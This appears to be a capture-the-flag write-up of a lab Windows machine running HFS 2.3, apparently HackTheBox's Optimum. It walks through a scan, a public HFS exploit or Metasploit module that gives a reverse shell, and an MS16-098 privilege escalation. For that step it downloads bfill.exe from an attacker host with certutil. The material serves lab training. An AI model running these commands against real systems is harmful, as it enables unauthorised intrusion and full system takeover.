MACHINE IP — 10.10.10.8
Nmap scan
nmap -p- -sCV -A -v 10.10.10.8PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_http-favicon: Unknown favicon MD5: 759792EDD4EF8E6BC2D1877D27153CB1
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2012|7|Vista|2008 (91%)
Here we got see that there is only http port if open
Movin ahead to http we got to see that HTTP server 2.3 is running on it
After this i enumerated the whole page but didn’t find any useful hint to move in after searching for server version vulnerability i got 39161.py form github here it this python exploit gives a reverse shell we just have to change our below things in 39161.py script
ip_addr = YOUR IPlocal_port = YOUR PORT NOTE :- change this in the python script (39161.py) for getting shell
After that we run the our nc on selected port and got reverse shell of kostas user
{ NOTE : you migth not get reverse shell so quickly you have to run script move then often for getting a reverse shell otherwise use msfconsole for getting reverse shell use “ exploit/windows/http/rejetto_hfs_exec , set payload windows/meterpreter/reverse_tcp “ and enter your rhost,rport,lhost,lport then run it } after getting meterpreter shell run shell command for getting a window shell After getting shell you will get to see that you a kostas user by using whoami command move to C:\Users\kostas\Desktop you will get user.txt.txt run type user.txt.txt to see the user hash
POST EXPLOITATION {Administrator power }
Run systeminfo
Copy this systeminfo and paste it in a file at your local-pc named (systeminfo) then run below command for checking the vulnerability for exploiting it
./windows-exploit-suggester.py -d 2019–09–18-mssb.xls -i /root/predator/oscp/htb/optimum/systeminfo1. ./windows-exploit-suggester.py --update
this will give you a latest file of expolits2../windows-exploit-suggester.py --database 2019–09–18-mssb.xls --systeminfo systeminfo2019-09-08-mssb.xls - file you get after update command
systeminfo - file in which you had copied windows output of systeminfo command
This python script is used for getting vulnerability in windows machine so that we can exploit it for privilege escalation
Here you will get various vulnerability for exploiting machine but there are some which indicates to privilege escalation
On looking for exploits i got MS16–098 to be useful after searching for while i got to see a github repository having .exe file which can be useful because we don’t have to compile it
There i got bfill.exe file now the main way i to transfer this file to our target windows machine
I used below command for transferring the file to window machine
python -m SimpleHTTPServer 80on my local pc having bfill.exe
Then used
certutil -urlcache -f http://10.10.14.7:80/bfill.exe raj.exeon windows machine
So here we got our exploit to machine
Now we just have to run the exploit
Here we access to system access now we are having all the permissions to move in machine
And here we got the root.txt
THANKYOU !!!!!
